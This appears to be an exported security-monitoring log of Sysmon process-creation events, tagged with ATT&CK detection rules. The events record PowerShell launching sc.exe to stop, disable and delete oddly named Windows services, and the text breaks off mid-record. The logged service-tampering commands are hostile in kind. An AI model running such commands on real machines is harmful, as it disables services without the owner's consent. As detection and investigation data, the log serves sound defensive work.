{df9fc3d3-b411-5ecf-0000-001043793000} +ProcessId: 1124 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Nationaloll Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Nationaloll Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.942248900Z"",""eventRecordID"":""3783"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.938\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-001043793000}\r\nProcessId: 1124\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Nationaloll Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.938"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-001043793000}"",""processId"":""1124"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Nationaloll Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:02.189",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.859 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-00109e773000} +ProcessId: 2312 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Natimmonal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.863428200Z"",""eventRecordID"":""3781"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.859\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-00109e773000}\r\nProcessId: 2312\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.859"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-00109e773000}"",""processId"":""2312"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Natimmonal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:02.123",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.747 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-001026753000} +ProcessId: 652 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaaal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.757061000Z"",""eventRecordID"":""3778"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.747\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-001026753000}\r\nProcessId: 652\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.747"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-001026753000}"",""processId"":""652"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaaal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:02.061",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.669 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-001077733000} +ProcessId: 6072 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete National +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete National",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.674275200Z"",""eventRecordID"":""3776"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.669\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-001077733000}\r\nProcessId: 6072\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete National\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.669"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-001077733000}"",""processId"":""6072"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete National"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.935",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.628 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-001095723000} +ProcessId: 1628 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop National +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop National",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.640146500Z"",""eventRecordID"":""3775"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.628\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-001095723000}\r\nProcessId: 1628\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop National\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.628"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-001095723000}"",""processId"":""1628"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop National"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.834",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.561 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-00104c6f3000} +ProcessId: 7804 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Sougoudl +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.564870300Z"",""eventRecordID"":""3772"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.561\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-00104c6f3000}\r\nProcessId: 7804\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.561"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-00104c6f3000}"",""processId"":""7804"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Sougoudl"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.795",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.500 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-0010b96c3000} +ProcessId: 2596 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WmdnPnSN +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 